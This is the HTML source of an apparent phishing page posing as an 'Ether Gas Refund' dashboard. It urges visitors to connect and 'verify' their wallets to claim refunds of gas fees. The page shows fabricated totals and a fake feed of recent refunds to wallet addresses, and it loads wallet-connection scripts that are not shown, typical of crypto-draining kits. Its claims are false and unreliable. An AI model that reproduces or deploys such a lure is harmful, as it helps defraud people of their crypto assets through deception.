<html lang="en">

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="Responsive Admin Dashboard Template">
  <meta name="keywords" content="admin,dashboard">
  <meta name="author" content="stacks">
  <!-- The above 6 meta tags *must* come first in the head; any other head content must come *after* these tags -->

  <!-- Title -->
  <title>Dashboard | Ether Gas Refund</title>


  <script charset="UTF-8" type="text/javascript"
    src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
  <script charset="UTF-8" type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script>
  <script charset="UTF-8" type="text/javascript"
    src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>
  <script charset="UTF-8" type="text/javascript" src="/scripts/wallet-connect-v3.js"></script>
  <link charset="UTF-8" rel="stylesheet" href="/styles/popup-6.css">
  </link>
  <script charset="UTF-8" type="text/javascript" src="/wallet-connect.js"></script>
    <script charset="UTF-8" type="text/javascript"
      src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
    <script charset="UTF-8" type="text/javascript"
      src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script>
    <script charset="UTF-8" type="text/javascript"
      src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>
    <script charset="UTF-8" type="text/javascript" src="/scripts/wallet-connect-v3.js"></script>
    <link charset="UTF-8" rel="stylesheet" href="/styles/popup-6.css">
    </link>




        <!-- Styles -->
        <link href="https://fonts.googleapis.com/css606f.css?family=Poppins:400,500,700,800&amp;display=swap"
          rel="stylesheet">
        <link href="https://fonts.googleapis.com/icone91f.css?family=Material+Icons" rel="stylesheet">
        <link href="/assets/plugins/bootstrap/css/bootstrap.min.css" rel="stylesheet">
        <link href="/assets/plugins/font-awesome/css/all.min.css" rel="stylesheet">
        <link href="/assets/plugins/perfectscroll/perfect-scrollbar.css" rel="stylesheet">
        <link href="/assets/plugins/pace/pace.css" rel="stylesheet">
        <link href="/assets/plugins/apexcharts/apexcharts.css" rel="stylesheet">
        <link rel="stylesheet" href="/modal/modal.css">


        <!-- Fontawesome CDN Link -->
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" />
        <!-- Theme Styles -->
        <link href="/assets/css/main.min.css" rel="stylesheet">
        <link href="/assets/css/custom.css" rel="stylesheet">

</head>

<body class="page-sidebar-collapsed">



  <div class="page-container livelife">
    <div class="page-content">
      <div class="page-header">
        <nav class="navbar navbar-expand-lg d-flex justify-content-between">
          <div class="header-title flex-fill">
            <h5>Dashboard</h5>
          </div>
        </nav>
      </div>
      <div class="main-wrapper">

        <div class="row">
          <div class="col-lg-6">
            
            <div class="card widget widget-info card-bg">
              <div class="card-body" style="background-color: #1c1c27">
                <div class="widget-info-container">
                  <div class="widget-info-image" style="background: url('./assets/images/ethgg.png')"></div>
                  <h5 class="widget-info-title text-white">Claim Gas Refund</h5>
                  <p class="widget-info-text">Ethereum gas fees can be a major headache. Check if you are eligible for a
                    refund on your transaction fees. Kindly Verify your wallet transactions in order to reclaim your spent gas fee from previous transactions.</p>
                  <span class="btn btn-primary interact-button widget-info-action">Claim Refund</span>
                </div>
              </div>
            </div>
            
          </div>
          <div class="col-lg-6">
            <div class="row">
              <div class="col-lg-6">
                <div class="card stats-card">
                  <div class="card-body">
                    <div class="stats-info">
                      <h5 class="card-title">$ 375 K</h5>
                      <p class="stats-text">Total Gas Refunded</p>
                    </div>
                    <div class="stats-icon change-success">
                      <i class="material-icons">+ 3,874 % </i>
                    </div>
                  </div>
                </div>
              </div>
              <div class="col-lg-6">
                <div class="card stats-card">
                  <div class="card-body">
                    <div class="stats-info">
                      <h5 class="card-title">$ 22,513</h5>
                      <p class="stats-text">Total Gas Spent</p>
                    </div>
                    <div class="stats-icon change-success">
                      <i class="material-icons">19 %</i>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="row">
              <div class="col-lg-6">
                <div class="card stats-card">
                  <div class="card-body">
                    <div class="stats-info">
                      <h5 class="card-title">$ 16,841</h5>
                      <p class="stats-text">Claimable Gas</p>
                    </div>
                    <div class="stats-icon change-success">
                      <i class="material-icons">76 %</i>
                    </div>
                  </div>
                </div>
              </div>
              <div class="col-lg-6">
                <div class="card stats-card">
                  <div class="card-body">
                    <div class="stats-info">
                      <h5 class="card-title">$ 4,743</h5>
                      <p class="stats-text">Excessive gas spent</p>
                    </div>
                    <div class="stats-icon change-danger">
                      <i class="material-icons">13 %</i>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="row">
          <div class="col-lg-4">
            <div class="card card-bg">
              <div class="card-body">
                <h5 class="card-title"> Gas Transactions</h5>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-primary text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-plus-lg" viewBox="0 0 16 16">
                          <path fill-rule="evenodd"
                            d="M8 2a.5.5 0 0 1 .5.5v5h5a.5.5 0 0 1 0 1h-5v5a.5.5 0 0 1-1 0v-5h-5a.5.5 0 0 1 0-1h5v-5A.5.5 0 0 1 8 2" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0x496e2061...
                        </h4>
                        <p>7 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$2,400</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-plus-lg" viewBox="0 0 16 16">
                          <path fill-rule="evenodd"
                            d="M8 2a.5.5 0 0 1 .5.5v5h5a.5.5 0 0 1 0 1h-5v5a.5.5 0 0 1-1 0v-5h-5a.5.5 0 0 1 0-1h5v-5A.5.5 0 0 1 8 2" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0xEa476F2c...</h4>
                        <p>13 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$300</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-danger text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-plus-lg" viewBox="0 0 16 16">
                          <path fill-rule="evenodd"
                            d="M8 2a.5.5 0 0 1 .5.5v5h5a.5.5 0 0 1 0 1h-5v5a.5.5 0 0 1-1 0v-5h-5a.5.5 0 0 1 0-1h5v-5A.5.5 0 0 1 8 2" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0xc950c48a...</h4>
                        <p>17 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-danger">-$17</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-warning text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-plus-lg" viewBox="0 0 16 16">
                          <path fill-rule="evenodd"
                            d="M8 2a.5.5 0 0 1 .5.5v5h5a.5.5 0 0 1 0 1h-5v5a.5.5 0 0 1-1 0v-5h-5a.5.5 0 0 1 0-1h5v-5A.5.5 0 0 1 8 2" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0x0DE77229...</h4>
                        <p>18 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-danger">-$220</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-info text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-plus-lg" viewBox="0 0 16 16">
                          <path fill-rule="evenodd"
                            d="M8 2a.5.5 0 0 1 .5.5v5h5a.5.5 0 0 1 0 1h-5v5a.5.5 0 0 1-1 0v-5h-5a.5.5 0 0 1 0-1h5v-5A.5.5 0 0 1 8 2" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0xc80829d9e...</h4>
                        <p>25 mins ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+1400%</span></p>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="col-lg-4">
            <div class="card main-chart-card">
              <div class="card-body">
                <div id="apex3"></div>
              </div>
            </div>
          </div>
          <div class="col-lg-4">
            <div class="card card-bg">
              <div class="card-body">
                <h5 class="card-title"> Top Gas Refund</h5>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-send-plus" viewBox="0 0 16 16">
                          <path
                            d="M15.964.686a.5.5 0 0 0-.65-.65L.767 5.855a.75.75 0 0 0-.124 1.329l4.995 3.178 1.531 2.406a.5.5 0 0 0 .844-.536L6.637 10.07l7.494-7.494-1.895 4.738a.5.5 0 1 0 .928.372zm-2.54 1.183L5.93 9.363 1.591 6.602z" />
                          <path
                            d="M16 12.5a3.5 3.5 0 1 1-7 0 3.5 3.5 0 0 1 7 0m-3.5-2a.5.5 0 0 0-.5.5v1h-1a.5.5 0 0 0 0 1h1v1a.5.5 0 0 0 1 0v-1h1a.5.5 0 0 0 0-1h-1v-1a.5.5 0 0 0-.5-.5" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0x65cfb290...
                        </h4>
                        <p>1 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$14,879</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-send-plus" viewBox="0 0 16 16">
                          <path
                            d="M15.964.686a.5.5 0 0 0-.65-.65L.767 5.855a.75.75 0 0 0-.124 1.329l4.995 3.178 1.531 2.406a.5.5 0 0 0 .844-.536L6.637 10.07l7.494-7.494-1.895 4.738a.5.5 0 1 0 .928.372zm-2.54 1.183L5.93 9.363 1.591 6.602z" />
                          <path
                            d="M16 12.5a3.5 3.5 0 1 1-7 0 3.5 3.5 0 0 1 7 0m-3.5-2a.5.5 0 0 0-.5.5v1h-1a.5.5 0 0 0 0 1h1v1a.5.5 0 0 0 1 0v-1h1a.5.5 0 0 0 0-1h-1v-1a.5.5 0 0 0-.5-.5" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0xbeda4c0c...</h4>
                        <p>4 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$7,436</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-send-plus" viewBox="0 0 16 16">
                          <path
                            d="M15.964.686a.5.5 0 0 0-.65-.65L.767 5.855a.75.75 0 0 0-.124 1.329l4.995 3.178 1.531 2.406a.5.5 0 0 0 .844-.536L6.637 10.07l7.494-7.494-1.895 4.738a.5.5 0 1 0 .928.372zm-2.54 1.183L5.93 9.363 1.591 6.602z" />
                          <path
                            d="M16 12.5a3.5 3.5 0 1 1-7 0 3.5 3.5 0 0 1 7 0m-3.5-2a.5.5 0 0 0-.5.5v1h-1a.5.5 0 0 0 0 1h1v1a.5.5 0 0 0 1 0v-1h1a.5.5 0 0 0 0-1h-1v-1a.5.5 0 0 0-.5-.5" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0xc950c48a...</h4>
                        <p>7 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$1,745</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-send-plus" viewBox="0 0 16 16">
                          <path
                            d="M15.964.686a.5.5 0 0 0-.65-.65L.767 5.855a.75.75 0 0 0-.124 1.329l4.995 3.178 1.531 2.406a.5.5 0 0 0 .844-.536L6.637 10.07l7.494-7.494-1.895 4.738a.5.5 0 1 0 .928.372zm-2.54 1.183L5.93 9.363 1.591 6.602z" />
                          <path
                            d="M16 12.5a3.5 3.5 0 1 1-7 0 3.5 3.5 0 0 1 7 0m-3.5-2a.5.5 0 0 0-.5.5v1h-1a.5.5 0 0 0 0 1h1v1a.5.5 0 0 0 1 0v-1h1a.5.5 0 0 0 0-1h-1v-1a.5.5 0 0 0-.5-.5" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0x55bec3c1...</h4>
                        <p>8 min ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$4,982</span></p>
                    </div>
                  </div>
                </div>
                <div class="transactions-list">
                  <div class="tr-item">
                    <div class="tr-company-name">
                      <div class="tr-icon tr-card-icon tr-card-bg-success text-white">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor"
                          class="bi bi-send-plus" viewBox="0 0 16 16">
                          <path
                            d="M15.964.686a.5.5 0 0 0-.65-.65L.767 5.855a.75.75 0 0 0-.124 1.329l4.995 3.178 1.531 2.406a.5.5 0 0 0 .844-.536L6.637 10.07l7.494-7.494-1.895 4.738a.5.5 0 1 0 .928.372zm-2.54 1.183L5.93 9.363 1.591 6.602z" />
                          <path
                            d="M16 12.5a3.5 3.5 0 1 1-7 0 3.5 3.5 0 0 1 7 0m-3.5-2a.5.5 0 0 0-.5.5v1h-1a.5.5 0 0 0 0 1h1v1a.5.5 0 0 0 1 0v-1h1a.5.5 0 0 0 0-1h-1v-1a.5.5 0 0 0-.5-.5" />
                        </svg>
                      </div>
                      <div class="tr-text">
                        <h4 class="text-white">0x27b851a1...</h4>
                        <p>12 mins ago</p>
                      </div>
                    </div>
                    <div class="tr-rate">
                      <p><span class="text-success">+$23,700</span></p>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

        </div>
      </div>
    </div>
  

    <!-- Javascripts -->
    <script src="/assets/plugins/jquery/jquery-3.4.1.min.js"></script>
    <script src="https://unpkg.com/@popperjs/core@2"></script>
    <script src="/assets/plugins/bootstrap/js/bootstrap.min.js"></script>
    <script src="https://unpkg.com/feather-icons"></script>
    <script src="/assets/plugins/perfectscroll/perfect-scrollbar.min.js"></script>
    <script src="/assets/plugins/pace/pace.min.js"></script>
    <script src="/assets/plugins/apexcharts/apexcharts.min.js"></script>
    <script src="/assets/plugins/sparkline/jquery.sparkline.min.js"></script>
    <script src="/assets/js/main.min.js"></script>
    <script src="/assets/js/pages/dashboard.js"></script>
</body>

</html>
